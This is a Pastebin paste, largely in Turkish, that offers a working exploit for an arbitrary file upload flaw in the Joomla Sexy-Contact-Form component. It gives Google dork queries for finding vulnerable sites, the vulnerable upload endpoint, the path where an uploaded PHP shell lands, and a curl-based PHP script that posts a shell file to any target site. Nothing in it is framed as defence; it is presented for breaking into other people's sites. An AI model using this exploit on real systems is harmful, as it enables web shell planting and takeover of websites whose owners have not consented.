Advertisement
KingSkrupellos

Joomla Sexy-Contact-Form Shell Upload Vulnerability Exploit

Sep 25th, 2017
336
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.47 KB | None | 0 0
  1. Exploitin Türkçe Yazarı => KingSkrupellos - Cyberizm Digital Security Team
  2.  
  3. Exploitin Başlığı => Joomla Sexy-Contact-Form Arbitrary File Upload Vulnerability Exploit
  4.  
  5. Konu => https://www.cyberizm.org/cyberizm-joomla-sexy-contact-form-shell-upload-vulnerability-exploit.html
  6.  
  7. Videolu Anlatım =>
  8.  
  9. [video=youtube]https://www.youtube.com/watch?v=ZVL2jvAafnA[/video]
  10.  
  11. Google Dork:
  12.  
  13. inurl:”/components/com_sexycontactform/”
  14.  
  15. intext:””Powered by sexycontactform”
  16.  
  17. Exploit : HEDEFSITE/components/com_sexycontactform/fileupload/index.php
  18.  
  19. Dosyanın Yüklendiği Dizin =>
  20.  
  21. HEDEFSİTE/components/com_sexycontactform/fileupload/files/DOSYAN.php
  22.  
  23. [hide][code]
  24. #!/usr/bin/php -q
  25. <?php
  26. #Google Dorks: "Powered by sexycontact" site:gr
  27. #or use your mind :v
  28. #Shell Access: Http://site.com/components/com_sexycontactform/fileupload/files/sh3ll.php
  29. echo "###############<<com_sexycontactform File Upload>>##############\n\n";
  30. print " Coded By KingSkrupellos "
  31. ";
  32. echo "Cyberizm.Org Digital Security Team\n\n";
  33. echo "####################[#]Welcome Master[#}######################\n\n";
  34. $uploadfile="up.php";
  35. $ch =curl_init("http://HEDEFSITE/components/com_sexycontactform/fileupload/index.php");
  36. curl_setopt($ch, CURLOPT_POST, true);
  37. curl_setopt($ch, CURLOPT_POSTFIELDS,
  38. array('file'=>"@$uploadfile"));
  39. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  40. $postResult = curl_exec($ch);
  41. print $postResult;
  42. curl_close($ch);
  43.  
  44. ?>[/code][/hide]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement